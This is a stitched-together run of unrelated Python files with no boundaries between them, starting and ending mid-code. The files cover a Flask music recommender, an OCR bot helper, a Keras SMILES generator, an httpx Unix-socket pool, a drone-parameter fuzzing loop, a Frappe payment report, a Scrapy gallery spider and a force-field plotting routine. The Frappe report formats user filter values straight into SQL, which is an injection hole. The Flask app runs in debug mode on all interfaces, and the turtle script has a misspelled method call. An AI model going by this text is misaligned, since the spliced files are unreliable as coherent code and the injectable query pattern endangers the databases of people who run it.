sa.frequency_count(word_list) # 词频统计 word_info = sa.make_query(word_freq) # 获得词语信息 sentiment = sa.method_weighted_word_freq(word_info=word_info, word_freq=word_freq) # 获得情感分类 cluster_id = sa.cluster_sent_map[sentiment] # 获得情感对应的聚类标签 # 查询cluster内的歌曲 query_statement = 'SELECT * FROM ' + app.config['TABLE_NAME'] + ' WHERE m_cluster=' + str(cluster_id) # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 查询音乐信息 musics = dt.query(db, query_statement) import random res = musics[random.randint(0, len(musics)-1)] # 随机选择一首cluster内的歌曲 return '%s' % res[-1] @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 @app.errorhandler(500) def internal_server_error(e): return render_template('500.html'), 500 if __name__ == '__main__': app.run(debug=True, host='0.0.0.0') from io import BytesIO import requests from aip import AipOcr from nonebot import get_driver from PIL import Image from nonebot import logger from .data_load import PATH api_key = get_driver().config.ocr_key client = AipOcr(api_key['appId'], api_key['apiKey'], api_key['secretKey']) def save_pic(url :str, name: str): res = requests.get(url) img = Image.open(BytesIO(res.content)) img.save(PATH + name + ".png") def check_pic(url :str): res = client.basicGeneralUrl(url) logger.info('识别完成') if {'words': '配餐中'} in res['words_result'] and {'words': '待取餐'} in res['words_result']: return True Oleksii-Kshenskyi/purple_tools0 import argparse import sys class ErrorRaisingArgumentParser(argparse.ArgumentParser): def error(self, message): raise sys.exc_info()[1] class ArithmeticParser: def _get_help_for_positional_argument(self, position): return '{0} positional arithmetic operation argument.'.format(position) def _add_arguments(self, parser): parser.add_argument("operation", help="Arithmetic operation to perform.", choices=self.operations.keys()) parser.add_argument('first', type=int, help=self._get_help_for_positional_argument("First")) parser.add_argument('second', type=int, help=self._get_help_for_positional_argument("Second")) def run_operation(self, op_type, first, 
second): return self.operations[op_type](first, second) def add(self, a, b): return a + b def mul(self, a, b): return a * b def sub(self, a, b): return a - b def div(self, a, b): return a / b def __init__(self): self.operations = {"add": self.add, "sub": self.sub, "mul": self.mul, "div": self.div} self.parser = ErrorRaisingArgumentParser() self._add_arguments(self.parser) def run(self): parsing_result = self.parser.parse_args() return self.run_operation(parsing_result.operation, parsing_result.first, parsing_result.second) if __name__ == "__main__": print(ArithmeticParser().run())test/leaf_test.py import unittest from decision_tree.leaf import Leaf class LeafTest(unittest.TestCase): def test_leaf_constructor(self): expected_predictions = {'Grape': 2} rows = [['Red', 1, 'Grape'], ['Red', 1, 'Grape']] leaf = Leaf(rows) self.assertEqual(expected_predictions, leaf.predictions) def test_equals(self): rows = [['Red', 1, 'Grape'], ['Red', 1, 'Grape']] self.assertEqual(Leaf(rows), Leaf(rows)) if __name__ == '__main__': unittest.main() import turtle '''turtle.shape('square') finn=turtle.clone() finn.shape('square') finn.forward (100) finn.right(90) finn.forward(100) finn.right(90) finn.forward(100) finn.right(90) finn.forward(100) sam.shape('triangle') sam.left(45) sam.stamp() sam.forward(100) sam.stamp() sam.clearstamps() sam.right(130) sam.forward(100)''' sam=turtle.clone() sam.shape('circle') turtle.bgcolor('purple') sam.color('white') sam.stamp() sam.goto(0,0) sam.pensize(12) sam.goto(0,100) sam.color('yellow') sam.goto(50,100) sam.goto(50,0) sam.color('green') sam.goto(50,-100) sam.goto(100,-100) sam.color('blue') sam.shape('arrow') sam.goto(100,0) def up(): sam.setheading(90) sam.forward(50) sam.onkeypress(up,'w') def down(): sam.setheading(180) sam.forward(50) sam.onkeypress(down,'s') def left(): sam.setheadling(270) sam.left(50) sam.onkeypress(left,'a') def right(): sam.setheading(90) sam.right(50) sam.onkeypress(right,'d') sam.listen() src/python/data_generator.py ########################################## # Implementation of a generator based on # https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly.html ########################################## import os, sys import numpy as np import pandas as pd import keras class DataGenerator(keras.utils.Sequence): 'Generates data for Keras' def __init__(self, list_IDs, batch_size, max_len_model, path_data, n_chars, indices_token, token_indices, pad_char, start_char, end_char, shuffle=True): 'Initialization' self.max_len_model = max_len_model self.batch_size = batch_size self.list_IDs = list_IDs self.shuffle = shuffle self.path_data = path_data self.n_chars = n_chars self.pad_char = pad_char self.start_char = start_char self.end_char = end_char self.on_epoch_end() f=open(self.path_data) self.lines=f.readlines() self.indices_token = indices_token self.token_indices = token_indices def __len__(self): 'Denotes the number of batches per epoch' return int(np.floor(len(self.list_IDs) / self.batch_size)) def __getitem__(self, index): 'Generate one batch of data' # Generate indexes of the batch indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size] # Find list of IDs list_IDs_temp = [self.list_IDs[k] for k in indexes] # Generate data X, y = self.__data_generation(list_IDs_temp) return X, y def on_epoch_end(self): 'Updates indexes after each epoch' self.indexes = np.arange(len(self.list_IDs)) if self.shuffle == True: np.random.shuffle(self.indexes) def one_hot_encode(self, token_list, n_chars): output = 
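# --- Hedged standalone sketch of the encoding this generator applies ----------
# Each SMILES string is wrapped in start/end characters, tokenised to integer
# indices, padded to max_len_model, and one-hot encoded so that the batch holds
# X = tokens [0..n-2] and y = tokens [1..n-1] (next-character prediction).  A
# minimal numpy illustration with a toy vocabulary (names are hypothetical):
import numpy as np

toy_vocab = {'A': 0, 'G': 1, 'E': 2, ' ': 3}   # ' ' used as the padding character

def one_hot(indices, n_chars):
    """Return a (len(indices), n_chars) one-hot matrix, as in one_hot_encode()."""
    out = np.zeros((len(indices), n_chars), dtype=int)
    out[np.arange(len(indices)), indices] = 1
    return out

tokens = [toy_vocab[c] for c in 'GAGE'] + [toy_vocab[' ']] * 2   # padded to length 6
X = one_hot(tokens[:-1], n_chars=len(toy_vocab))   # model input
y = one_hot(tokens[1:], n_chars=len(toy_vocab))    # shifted-by-one target
# -------------------------------------------------------------------------------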
np.zeros((token_list.shape[0], n_chars)) for j, token in enumerate(token_list): output[j, token] = 1 return output def smi_to_int(self, smile): """ this will turn a list of smiles in string format and turn them into a np array of int, with padding """ token_list = self.tokenize_sequence(smile) self.pad_seqs(token_list) int_list = [int(x[0]) for x in token_list] return np.asarray(int_list) def tokenize_sequence(self, smile): """ Tokenizes a list of sequences into a list of token lists """ token_lists = [] for x in smile: mol_tokens = [] posit = 0 while posit < len(x): t, p = self.get_token(x, posit) posit = p mol_tokens += [self.token_indices[t]] token_lists.append(mol_tokens) return token_lists def get_token(self, text, position): """ Return token from text at a particular position, assumes given position is valid """ return list(text)[position], position + 1 def pad_seqs(self, sequence): """ Pad sequences to given length """ padding = [self.token_indices[self.pad_char]]*(self.max_len_model - len(sequence)) padding_arr = [[x] for x in padding] sequence.extend(padding_arr) def enclose_smile(self, smi): """ Add the start and end char. Used when we read smiles directly from the txt file """ smi = self.start_char + smi + self.end_char return smi def clean_smile(self, smi): """ remove return line symbols if present """ smi = smi.replace('\n', '') return smi def __data_generation(self, list_IDs_temp): 'Generates batch of data containing batch_size samples' switch = 1 y = np.empty((self.batch_size, self.max_len_model-switch, self.n_chars), dtype=int) X = np.empty((self.batch_size, self.max_len_model-switch, self.n_chars), dtype=int) for i, ID in enumerate(list_IDs_temp): smi = self.lines[ID] # remove return line symbols smi = self.clean_smile(smi) # add starting and ending char smi = self.enclose_smile(smi) data = self.smi_to_int(smi) X[i] = self.one_hot_encode(data[:-1], self.n_chars) y[i] = self.one_hot_encode(data[1:], self.n_chars) return X, y scripts/test/validate-user.py from gitgang.github import members_only members_only(github_org='kazstat', github_repo='sdg-data-kazstat', gangfile='scripts/test/github-users.yml') #! 
/usr/bin/env python3 #-*- coding: UTF-8 -*- ### Legal # # Author: <> # License: ISC # from Urcheon.StageParse import StageParse from Urcheon import Pak import sys def main(): arg_stage = StageParse(description="%(prog)s is a tender knight who takes care of my lovely granger's little flower.") arg_stage.addStage("clean", help="clean stuff") arg_stage.addStage("discover", help="discover files") arg_stage.addStage("prepare", help="prepare source pakdir") arg_stage.addStage("build", help="build test pakdir") arg_stage.addStage("package", help="package release pak") arg_stage = arg_stage.parseArgs() stage = None if arg_stage.clean: stage = Pak.clean if arg_stage.discover: stage = Pak.discover if arg_stage.prepare: stage = Pak.prepare if arg_stage.build: stage = Pak.build if arg_stage.package: stage = Pak.package if stage: del sys.argv[1] stage(arg_stage.stage) if __name__ == "__main__": main() import asyncio import functools import ssl import typing import httpx import sniffio from httpx.backends.asyncio import SocketStream from httpx.backends.base import BaseSocketStream from httpx.dispatch.connection import HTTPConnection from httpx.dispatch.connection_pool import ConnectionPool async def open_uds_socket_stream( path: str, hostname: str, timeout: httpx.Timeout, ssl_context: ssl.SSLContext = None ) -> BaseSocketStream: async_library = sniffio.current_async_library() assert async_library == "asyncio" server_hostname = hostname if ssl_context else None try: stream_reader, stream_writer = await asyncio.wait_for( asyncio.open_unix_connection( path, ssl=ssl_context, server_hostname=server_hostname ), timeout.connect_timeout, ) except asyncio.TimeoutError: raise httpx.ConnectTimeout() return SocketStream(stream_reader=stream_reader, stream_writer=stream_writer) class UnixSocketHTTPConnection(HTTPConnection): def __init__(self, *, uds: str, **kwargs: typing.Any) -> None: super().__init__(**kwargs) self.uds = uds async def open_socket_stream( self, origin: httpx.Origin, timeout: httpx.Timeout, ssl_context: ssl.SSLContext = None, ) -> BaseSocketStream: path = self.uds host = origin.host self.logger.trace( f"start_connect uds path={path!r} host={host!r} timeout={timeout!r}" ) return await open_uds_socket_stream( path=path, hostname=host, timeout=timeout, ssl_context=ssl_context ) class UnixSocketConnectionPool(ConnectionPool): def __init__(self, *, uds: str, **kwargs: typing.Any) -> None: super().__init__(**kwargs) self.uds = uds def get_connection_factory(self) -> typing.Callable[..., HTTPConnection]: return functools.partial(UnixSocketHTTPConnection, uds=self.uds) import argparse import csv import os import time import numpy as np import pandas as pd from Cptool.config import toolConfig from Cptool.gaSimManager import GaSimManager from uavga.fuzzer import LGFuzzer # from Cptool.gaSimManager import GaSimManager if __name__ == '__main__': parser = argparse.ArgumentParser(description='Personal information') parser.add_argument('--device', dest='device', type=str, help='Name of the candidate') args = parser.parse_args() device = args.device if device is None: device = 0 print(device) param = [ "PSC_POSXY_P", "PSC_VELXY_P", "PSC_POSZ_P", "ATC_ANG_RLL_P", "ATC_ANG_PIT_P", "ATC_ANG_YAW_P", "ATC_RAT_RLL_I", "ATC_RAT_RLL_D", "ATC_RAT_RLL_P", "ATC_RAT_PIT_P", "ATC_RAT_PIT_I", "ATC_RAT_PIT_D", "ATC_RAT_YAW_P", "ATC_RAT_YAW_I", "ATC_RAT_YAW_D", "WPNAV_SPEED", "WPNAV_SPEED_UP", "WPNAV_SPEED_DN", "WPNAV_ACCEL", "ANGLE_MAX", ] # lgfuizzer = LGFuzzer(param, 
f'model/{Cptool.config.MODE}/{ModelFit.config.INPUT_LEN}/lstm.h5', # f'model/{Cptool.config.MODE}//trans.pkl', # f"./log/{Cptool.config.MODE}/csv/train.csv") # # lgfuizzer.run(num=3, meanshift=True) candidate_var, candidate_obj = LGFuzzer.return_random_n_gen(5) candidate_obj = np.array(candidate_obj, dtype=float).round(8) candidate_var = np.array(candidate_var, dtype=float).round(8) manager = GaSimManager(debug=toolConfig.DEBUG) results = [] i = 0 # 乱序 rand_index = (np.arange(candidate_obj.shape[0])) np.random.shuffle(rand_index) candidate_obj = candidate_obj[rand_index] candidate_var = candidate_var[rand_index] for index, vars, value_vector in zip(np.arange(candidate_obj.shape[0]), candidate_var, candidate_obj): # if skip if os.path.exists(f'result/params.csv'): while not os.access(f"result/params.csv", os.R_OK): continue data = pd.read_csv(f'result/params.csv') exit_data = data.drop(['score', 'result'], axis=1, inplace=False) if ((exit_data - value_vector).sum(axis=1).abs() < 0.00001).sum() > 0: continue manager.start_multiple_sitl(device) manager.mav_monitor_init(device) if not manager.mav_monitor_connect(): manager.stop_sitl() continue manager.mav_monitor_set_mission("Cptool/mission.txt", random=True) manager.mav_monitor_set_param(params=param, values=value_vector) print(f'======================={index} / {candidate_obj.shape[0]} ==========================') # manager.start_mav_monitor() manager.mav_monitor_start_mission() result = manager.mav_monitor_error() if result == 'skip': results.append(result) else: if not os.path.exists(f'result/params.csv'): while not os.access(f"result/params.csv", os.W_OK): continue data = pd.DataFrame(columns=(toolConfig.PARAM + ['score', 'result'])) else: while not os.access(f"result/params.csv", os.W_OK): continue tmp_row = value_vector.tolist() tmp_row.append(vars[0]) tmp_row.append(result) # Write Row with open("result/params.csv", 'a+') as f: csv_file = csv.writer(f) csv_file.writerow(tmp_row) manager.stop_sitl() i += 1 localtime = time.asctime(time.localtime(time.time())) # send_mail(Cptool.config.AIRSIM_PATH, localtime)tests/zed/out.py import magma as m import mantle from loam.boards.zed import Zed zed = Zed() zed.LED.on(2) main = zed.main() m.wire( 1, main.LED[0] ) m.wire( 1, main.LED[1] ) version https://git-lfs.github.com/spec/v1 oid sha256:7aea346f0d4b2627a21e9fd7189962ecdc9b5532676091f77155347083010ab7 size 7245 nextcertification/nextcertification/report/application_payment/application_payment.py # Copyright (c) 2013, Sameer and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe def execute(filters=None): columns = get_columns() data = get_data(filters) return columns, data def get_columns(): columns = [ { "fieldname": "application", "fieldtype": "Link", "label": "Application", "options": "Application", "width": 200 }, { "fieldname": "sales_invoice", "fieldtype": "Link", "label": "Sales Invoice", "options": "Sales Invoice", "width": 200 }, { "fieldname": "invoice_status", "fieldtype": "Data", "label": "Invoice Status", "width": 150 }, { "fieldname": "payment_entry", "fieldtype": "Link", "label": "Payment Entry", "options": "Payment Entry", "width": 200 }, { "fieldname": "payment_status", "fieldtype": "Data", "label": "Payment Status", "width": 150 }, { "fieldname": "bill_amt", "fieldtype": "Float", "label": "Billed Amount", "width": 150 }, { "fieldname": "pending_amt", "fieldtype": "Float", "label": "Pending Amount", "width": 150 } ] return columns def get_data(filters =None): 
query = """select TP.name as application, TSI.name as sales_invoice, TSI.status as invoice_status, pe.name as payment_entry, CASE WHEN pe.docstatus = 0 THEN 'draft' WHEN pe.docstatus = 1 THEN 'Submitted' WHEN pe.docstatus = 2 THEN 'Cancelled' ELSE Null END as payment_status, TSI.rounded_total as bill_amt, TSI.outstanding_amount as pending_amt from `tabApplication` as TP left join `tabSales Invoice` as TSI on TP.name = TSI.application left join `tabPayment Entry Reference` as per on TSI.name = per.reference_name and per.reference_doctype = 'Sales Invoice' left join `tabPayment Entry` as pe on pe.name = per.parent where TP.docstatus = 1 and TP.date between '{0}' and '{1}'""".format(filters.get('from_date'),filters.get('to_date')) if filters.get('application'): query += " and TP.name = '{0}'".format(filters.get('application')) result = frappe.db.sql(query ,as_dict=True) return result1-10 import typing from abc import abstractmethod from vkbottle.dispatch.rules import ABCRule class ABCFilter(ABCRule): @property @abstractmethod def rules(self) -> typing.Iterable[ABCRule]: pass # Setup.py file from setuptools import find_packages, setup with open("README.md", "r") as fh: long_description = fh.read() setup( name="my_lambdata_zarabi", # the name that you will install via pip version="1.3", author="", author_email="", description="A short description", long_description=long_description, long_description_content_type="text/markdown", # required if using a md file for long desc license="MIT", url="https://github.com/misqualzarabi/lambdata_misqual_z", # keywords="", packages=find_packages() # ["my_lambdata"] ) torabot/mods/ehentai/spy/ehentai/spiders/__init__.py # This package will contain the spiders of your Scrapy project # # Please refer to the documentation for information on how to create and manage # your spiders. 
import pytz import traceback from datetime import datetime from urllib import urlencode from scrapy.http import Request from scrapy.selector import Selector from scrapy.contrib.loader import ItemLoader from scrapy.contrib.loader.processor import Identity, TakeFirst from torabot.spy.spiders.redis import RedisSpider from torabot.spy.spiders.mixins import RequestMethodMixin from torabot.spy.error import failed from torabot.ut.time import TIME_FORMAT from ..items import Page, Post from ..rating import parse_rating class Ehentai(RequestMethodMixin, RedisSpider): name = 'ehentai' @property def request_method_mapping(self): return { 'uri': self.make_uri_requests, 'query': self.make_query_requests, } def make_query_requests(self, query): yield Request( make_query_uri(query), callback=self.parse, meta=dict(query=query), dont_filter=True, ) def make_uri_requests(self, query): yield Request( query['uri'], callback=self.parse, meta=dict(query=query), dont_filter=True, ) def parse(self, response): query = response.meta['query'] try: sel = Selector(response) return Page( uri=response.url, query=query, posts=[make_post(sub) for sub in sel.xpath( '//table[@class="itg"]/tr[starts-with(@class, "gtr")]' )] ) except: return failed(query, traceback.format_exc(), response=response) class PostLoader(ItemLoader): default_item_class = Post default_input_processor = Identity() default_output_processor = TakeFirst() def ctime_in(self, values): for s in values: yield ( datetime .strptime(s.strip(), '%Y-%m-%d %H:%M') .replace(tzinfo=pytz.timezone('America/Anguilla')) # UTC -4 .astimezone(pytz.utc) .strftime(TIME_FORMAT) ) def cover_uri_in(self, values): for s in values: if s.startswith('http://'): yield s else: parts = s.split('~') # title may contain ~ if len(parts) >= 4 and parts[0] == 'init': yield 'http://%s/%s' % (parts[1], parts[2]) def rating_in(self, values): for s in values: yield parse_rating(s) def make_post(sel): loader = PostLoader(selector=sel) loader.add_xpath('uri', './/div[@class="it5"]/a/@href') loader.add_xpath('title', 'string(.//div[@class="it5"]/a)') loader.add_xpath('cover_uri', './/div[@class="it2"]/img/@src') loader.add_xpath('cover_uri', './/div[@class="it2"]/text()') loader.add_xpath('category', './/td[@class="itdc"]//img/@alt') loader.add_xpath('ctime', './/td[@class="itd"]/text()') loader.add_xpath('uploader', 'string(.//td[@class="itu"]//a)') loader.add_xpath('rating', './/div[@class="it4"]/div/@style') loader.add_xpath('torrent_uri', './/div[@class="it3"]//a/@href') return loader.load_item() def make_query_uri(query): get = lambda name: 1 if len(query) == 2 else int(query.get(name, 0)) return 'http://g.e-hentai.org/?' + urlencode({ 'f_doujinshi': get('doujinshi'), 'f_manga': get('manga'), 'f_artistcg': get('artistcg'), 'f_gamecg': get('gamecg'), 'f_western': get('western'), 'f_non-h': get('non-h'), 'f_imageset': get('imageset'), 'f_cosplay': get('cosplay'), 'f_asianporn': get('asianporn'), 'f_misc': get('misc'), 'f_search': query['query'].encode('utf-8'), 'f_apply': 'Apply+Filter', }) import matplotlib.pyplot as plt def flag_measurements(fname='bonds_N-C_deg-2.npz', mindb=None, groups=None, minfname='bonds_N-C_deg-2.minimum.npz', params={"Mol": {}, "Bonds": ['b1'], "Angles": [], "ImproperTorsions": [], "ProperTorsions": [], 'Energy': {}} ): """ energy is a list of keys to search for energy, example: {'oFF'; 'vdW'}. Plotted energies are relative to the min value. 
""" d = None m = None rms_str="ffRMS(L)= {:9.4e} ffRMS(E)= {:9.4e} measL= {:9.4e} measRMS(L)= {:9.4e} measRMS(E)= {:9.4e} " rms_str="{:9.4f} {:9.4f} {:9.4f} {:9.4f} {:9.4f} " ene_str="{:s}: meanE= {:9.4f} RMS(E)= {:9.4f} maxAngEne= {:9.4f} {:9.4f}" ene_maxdel_str="DmeanE= {:9.4f} maxDiffAngEne= {:9.4f} {:9.4f} maxGapAngEne {:9.4f} {:9.4f}" ref_ene_key = 'qm' index = None if os.path.exists("index.txt"): with open("index.txt", 'r') as fid: index = dict([line.strip('\n').split()[::-1] for line in fid.readlines()]) elif os.path.exists(os.path.join("..","index.txt")): with open(os.path.join("..","index.txt"), 'r') as fid: index = dict([line.strip('\n').split()[::-1] for line in fid.readlines()]) if(os.path.exists(fname)): d = np.load(fname, allow_pickle=True) if(mindb is not None): m = mindb elif(os.path.exists(minfname)): if(minfname.split('.')[-1] == "npz"): m = np.load(minfname, allow_pickle=True) else: with open(minfname, "rb") as fid: m = dict(pickle.load(fid)) if(m is None): return if("Mol" not in params): params["Mol"] = {} params_new = collections.defaultdict(list) params_new.update(params) params = params_new params_new = None measurements = ["Bonds", "Angles", "ImproperTorsions", "ProperTorsions", "Energy"] colors = ['red', 'blue', 'purple', 'green', 'orange', 'yellow'] rows = 1 hasbonds = int(len(params["Bonds"]) > 0) hasangles = int(len(params["Angles"]) + len(params["ImproperTorsions"]) + len(params["ProperTorsions"]) > 0) hasenergy = int(len(params["Energy"]) > 0) rows = hasbonds + hasangles + hasenergy logger.debug("VAR: rows= " + str(rows)) mol_list = params['Mol'] if(mol_list == {}): vals = list(m["mol_data"].keys()) mol_list = dict(zip(range(len(vals)), vals)) param_list = [p for p_list in measurements for p in params[p_list]] ene_out_fname = ("ene."+"{:s}."*len(param_list)+"txt").format(*param_list) fid = open(ene_out_fname, 'w') ; fid.close() # this is looping through each molecule for jj, (name, smiles_list) in enumerate(mol_list.items()): print("{:4d} {:4d} {:64s}:".format(jj,int(index[name]),name), end=" ") hits=0 fig = plt.figure(figsize=(8,4*rows),dpi=120) logger.debug("fig created id " + str(id(fig))) ax_grid = [] #[[]]*rows for r in range(rows): logger.debug("Init row {} for axes\n".format(r)) ax = [plt.subplot2grid((rows,3),(r,0), colspan=2, fig=fig)] ax.append(plt.subplot2grid((rows,3),(r,2), fig=fig, sharey=ax[0])) logger.debug("ax left {} ax right {}\n".format(id(ax[0]), id(ax[1]))) ax_grid.append(ax) logger.debug("axes look like\n{}\n".format(str(ax_grid))) checks = [[["Bonds"], hasbonds], \ [["Angles", "ProperTorsions", "ImproperTorsions"], hasangles],\ [["Energy"], hasenergy]] present = 0 plot_idx = {} for ncheck_i, check_i in enumerate(checks): if(check_i[1]): for param in check_i[0]: plot_idx[param] = present present += 1 logger.debug("Will plot using {} axes\n".format(present)) logger.debug(str(plot_idx)) fig.subplots_adjust(wspace=.3, hspace=.2,right=.95) ddata = [] mdata = {} mdatamean = {} lows = [] #first is key #then is param vs data # then is 1xN for param data (choose 0) # then is param #oFF_labels = [c[0] for c in m.values()] used_labels = [] c_idx = -1 used_colors = {} bond_r0 = {} bond_k = {} bond_smirks = {} smiles_hits = [] smiles_idx = [] bond_dict = {} nonempty_ene = False # this is looping through each conformation of the molecule for ii,smiles in enumerate(smiles_list): all_params = [] skip=False if(len(params["Energy"].keys()) > 0): for ene_group in params["Energy"]: if("energy" not in m["mol_data"][smiles]): logger.debug("SKIP 1") skip=True 
break if(ene_group == 'qm'): if('qm' not in m["mol_data"][smiles]["energy"]): logger.debug("SKIP 2") skip=True break else: for ene_type in params["Energy"][ene_group]: if(ene_type not in m["mol_data"][smiles]["energy"][ene_group]): logger.debug("SKIP 3") skip=True break if(skip): break if(skip): break if(skip): break for measure in measurements: if(measure == "Energy"): continue try: all_params += [p['oFF'] for p in m["mol_data"][smiles][measure]["indices"].values()] except KeyError: print("Mol with smiles", smiles, "empty or corrupted (missing", measure, ". Skipping") skip=True break if(skip): break for param in params[measure]: if(not (param in all_params)): #print(smiles, "Does not have", param) skip=True break if(skip): continue #print("HIT!") #try: #print(m[smiles].shape, end=" ") #if(False and (not (d is None)) and smiles in d): if(0): for i,(j,jmin) in enumerate(zip(d[smiles][1].T[1:],m[smiles][1].T[1:])): label = m[smiles][0][0][i]['id'] #print(ii, i, smiles, end=" ") ax = subplot2grid((1,3),(0,0), colspan=2) ax.plot(d[smiles][1][:,0], j,'b.', ms=5) ax.plot(m[smiles][1][:,0], jmin, 'k.-', ms=7) ddata += list(j) mdata.setdefault(m[smiles][0][i], []) mdata[m[smiles][0][i]] += list(jmin) ax2.hist(j,bins=10, color='b', orientation='horizontal') ax2.hist(jmin,bins=10, color='k', orientation='horizontal') else: for measure_ii, measure in enumerate(measurements): logger.debug("VAR: measure= " + str(measure)) if(measure not in params): logger.debug("Not in params so skipping: " + str(measure)) continue if(len(params[measure]) == 0): logger.debug("Nothing in params for: " + str(measure) + " so skipping") continue if(measure != "Energy"): for i,(index_key,index_dat) in enumerate(m["mol_data"][smiles][measure]["indices"].items()): label = index_dat['oFF'] #print(ii, i, smiles, jmin.mean(), end=" ") plot_label=None if(not (label in params[measure])): logger.debug("This param not wanted so skipping: " + str(label)) #print("param", label, " not wanted. skipping") continue logger.debug("Continuing to plot for : " + str(label)) hits += 1 #print(index_key) if(not (smiles in smiles_hits)): smiles_hits.append(smiles) smiles_idx.append(ii) if(not (label in used_labels)): plot_label=label used_labels.append(label) c_idx += 1 used_colors[label] = colors[c_idx] if( not ( label in ["a0", "b0", "t0", "i0"] )): if(measure == "Bonds"): bond_r0[label] = m['oFF'][label]['length'] elif(measure == "Angles"): bond_r0[label] = m['oFF'][label]['angle'] bond_smirks[label] = m['oFF'][label]['smirks'] bond_dict[label] = m['oFF'][label] if( not (label[0] in 'ti')): bond_k[label] = m['oFF'][label]['k'] color = used_colors[label] td_ang = m["td_ang"][m["mol_data"][smiles]["td_ang"]] measure_data = m["mol_data"][smiles][measure]["values"][:,index_dat["column_idx"]] #if(measure == "Angles"): # pass #measure_data *= np.pi/180 #print(plot_idx, "plotting", label, "td_ang=", td_ang) if(td_ang[0] is not None): logger.debug("***PLOTTING {:s} to ax {:s} id {}\n".format( str(measure), str(plot_idx[measure]), id(ax_grid[plot_idx[measure]][0]))) ax_grid[plot_idx[measure]][0].plot(td_ang, measure_data, lw=.1, ls='-', marker='.' 
, color=color, label=plot_label, ms=2) ax_grid[plot_idx[measure]][0].legend(loc='upper right') if(label not in mdata): mdata[label] = [] mdata[label] += list(measure_data) mdatamean.setdefault(smiles, {}) mdatamean[smiles].setdefault(label, []) mdatamean[smiles][label].append(measure_data.mean()) else: for ene_group in params['Energy']: logger.debug("VAR: ene_group=" + str(ene_group)) if(ene_group == 'qm'): c_idx += 1 used_colors[ene_group] = colors[c_idx] label = ene_group color = used_colors[label] ene = np.array(m["mol_data"][smiles]['energy'][ene_group]) * hartree2kcalmol ene -= ene.min() td_ang = m["td_ang"][m["mol_data"][smiles]["td_ang"]] if(td_ang[0] is not None): logger.debug("plotting to idx" + str(plot_idx[measure]) + " for measure " + str(measure) ) logger.debug("***PLOTTING {:s} to ax {:s} id {}\n".format( str(measure), str(plot_idx[measure]), id(ax_grid[plot_idx[measure]][0]))) ax_grid[plot_idx[measure]][0].plot(td_ang, ene, lw=1.5, ls='-', marker='.', ms=4, color=color, label=label) ax_grid[plot_idx[measure]][0].set_ylabel("Energy (kcal/mol)") nonempty_ene = True if(label not in mdata): mdata[label] = [] mdata[label] += list(ene) mdatamean.setdefault(smiles, {}) mdatamean[smiles].setdefault(label, []) mdatamean[smiles][label].append(ene.mean()) else: logger.debug("VAR: ene_types=" + str(list(params["Energy"].keys()))) for ene_type in params["Energy"][ene_group]: logger.debug("VAR: ene_type=" + str(ene_type)) ene = m["mol_data"][smiles]['energy'][ene_group][ene_type] if(len(ene) > 0 and isinstance(ene[0], simtk.unit.Quantity)): ene = np.array([x.value_in_unit(x.unit) for x in ene]) ene -= ene.min() else: ene = np.array(ene) ene -= ene.min() label = ".".join((ene_group, ene_type)) c_idx += 1 used_colors[label] = colors[c_idx % len(colors)] color = used_colors[label] td_ang = m["td_ang"][m["mol_data"][smiles]["td_ang"]] if(td_ang[0] is not None): logger.debug("plotting to idx " + str(plot_idx[measure]) + " for measure " + str(measure) ) ax_grid[plot_idx[measure]][0].plot(td_ang, ene, lw=1.5, ls='-', marker='.', ms=4, color=color, label=label) ax_grid[plot_idx[measure]][0].set_ylabel("Energy (kcal/mol)") nonempty_ene = True if(label not in mdata): mdata[label] = [] mdata[label] += list(ene) mdatamean.setdefault(smiles, {}) mdatamean[smiles].setdefault(label, []) mdatamean[smiles][label].append(ene.mean()) if(nonempty_ene): ax_grid[plot_idx[measure]][0].legend(loc='upper left') #elif(jmin.mean() < 1.433): # print("Med:", ii, k) #else: # print("High:", ii, k) #print() #except TypeError: # print("TypeError") #except IndexError: # print("IndexError") title = str(dict([(k,v) for k,v in params.items() if (v != [] and k != "Mol")])) print("HITS= {:7.1f}".format(hits/len(smiles_list)), end=" ") for p in param_list: if( p in ["a0", "b0", "i0", "t0"] ): m['oFF'][p]['smirks'] = "None" logger.debug("hits or nonempty? 
" + str(hits > 0 or nonempty_ene)) if(hits > 0 or nonempty_ene): smiles_idx_str = ("{:s}."*len(smiles_idx)).format(*[str(x) for x in smiles_idx]) param_str = ("{:s}."*len(param_list)).format(*[str(x) for x in param_list]) if(len(ddata) > 0): ax2.hist(ddata,bins=20, color='blue', orientation='horizontal') kT = (.001987*298.15) for ii,(label,dat) in enumerate(mdata.items()): #if(label[0] in "ait"): # #num *= np.pi/180 # if(rows == 2): # plot_idx = 1 # else: # plot_idx = 0 plot_row = -1 if(label[0] in "ait"): plot_row = plot_idx["Angles"] elif(label[0] == "b"): plot_row = plot_idx["Bonds"] else: plot_row = plot_idx["Energy"] logger.debug("VAR: plot_row=" + str(plot_row)) color=used_colors[label] ax_grid[plot_row][1].hist(dat,bins=20, color=used_colors[label], histtype='step', orientation='horizontal') if( label in ["a0", "b0", "t0", "i0"] ): continue # TODO: calculate spread of torsions if(label[0] not in 'ab'): continue num = float(str(bond_r0[label]).split()[0]) force_k = float(str(bond_k[label]).split()[0]) delta = (2*(kT)/force_k)**.5 if(label[0] in "ait"): delta *= 180/np.pi dat = np.array(dat) if((dat < (num - delta)).any() or (dat > (num + delta)).any()): print(label + "= R", end=" ") elif(dat.max() < num or dat.min() > num): print(label + "= Y", end=" ") else: print(label + "= G", end=" ") ax_grid[plot_row][0].axhline(y=num, ls='-', marker='.', color='black', ms=20, mec='black', mfc=color) ax_grid[plot_row][0].axhline(y=num + delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color) ax_grid[plot_row][0].axhline(y=num - delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color) ax_grid[plot_row][1].axhline(y=num, ls='-', marker='.', color='black', ms=20, mec='black', mfc=color) ax_grid[plot_row][1].axhline(y=num + delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color) ax_grid[plot_row][1].axhline(y=num - delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color) #ax[0].legend() #if(rows > 1): # ax[1].legend() print_header = True smiles_out_fname = ("mol." 
